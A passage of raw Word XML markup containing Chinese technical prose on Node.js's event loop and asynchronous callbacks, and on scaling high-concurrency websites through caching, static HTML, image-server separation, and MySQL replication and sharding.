      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的情况下，依然可以对任务进行并行处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是单线程的。它通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>事件轮询（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来实现并行操作，对此，我们应该要充分利用这一点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>尽可能的避免阻塞操作，取而代之，多使用非阻塞操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00CD234F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(4) gooleV8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00CD234F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00CD234F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(5) Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>典型的模式是使用异步回调</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。基本上，你告诉</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>要做的事，它执行完后便会调用你的函数（回调函数）。这是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是单线程的。在你等待回调函数执行过程中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可继续执行其他事务，不必被阻塞直到该请求完毕。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00CD234F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>这对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器尤其重要。在现代</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>应用访问数据库的过程中特别普遍。当你等待数据库返回结果的过程中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可以处理更多请求。与每次连接仅处理一个线程相比，它使你以很小的开销来处理成千上万个并行连接</w:t>
      </w:r>
      <w:r w:rsidR="001F380B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00376790" w:rsidRPr="00F41A4C" w:rsidRDefault="00DE6C8E" w:rsidP="002B1880">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00E30565">
        <w:t xml:space="preserve">.4  </w:t>
      </w:r>
      <w:r w:rsidR="00E30565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高并发网站优化手段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35D84" w:rsidRDefault="00F35D84" w:rsidP="003909E7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>高并发高负载网站的系统架构之缓存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00376790" w:rsidRDefault="003909E7" w:rsidP="003909E7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003909E7">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>高并发高负载网站的系统架构之</w:t>
      </w:r>
      <w:r w:rsidRPr="003909E7">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="003909E7">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>静态化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003909E7" w:rsidRDefault="003909E7" w:rsidP="003909E7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>高并发高负载网站的系统架构之图片服务器分离</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003909E7" w:rsidRPr="003909E7" w:rsidRDefault="003909E7" w:rsidP="003909E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>高并发高负载网站的系统架构之数据库集群和库表散列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>一：高并发高负载类网站关注点之数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>没错,首先是数据库,这是大多数应用所面临的首个SPOF。尤其是Web2.0的应用，数据库的响应是首先要解决的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>一般来说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>是最常用的，可能最初是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>主机，当数据增加到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>万以上，那么，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>的效能急剧下降。常用的优化措施是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>M-S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>（主</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>从）方式进行同步复制，将查询和操作和分别在不同的服务器上进行操作。我推荐的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>M-M-Slaves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>方式，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>个主</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Slaves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，需要注意的是，虽然有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，但是同时只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>个是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，我们可以在一定时候切换。之所以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，是保证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>不会又成为系统的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>SPOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>    Slaves可以进一步负载均衡，可以结合LVS,从而将select操作适当的平衡到不同的slaves上。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>以上架构可以抗衡到一定量的负载，但是随着用户进一步增加，你的用户表数据超过1千万，这时那个M变成了SPOF。你不能任意扩充Slaves，否则复制同步的开销将直线上升，怎么办？我的方法是表分区，从业务层面上进行分区。最简单的，以用户数据为例。根据一定的切分方式，比如id，切分到不同的数据库集群去。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>    全局数据库用于meta数据的查询。缺点是每次查询，会增加一次，比如你要查一个用户nightsailer,你首先要到全局数据库群找到nightsailer对应的cluster id，然后再到指定的cluster找到nightsailer的实际数据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    每个cluster可以用m-m方式，或者m-m-slaves方式。这是一个可以扩展的结构，随着负载的增加，你可以简单的增加新的mysql cluster进去。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>需要注意的是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
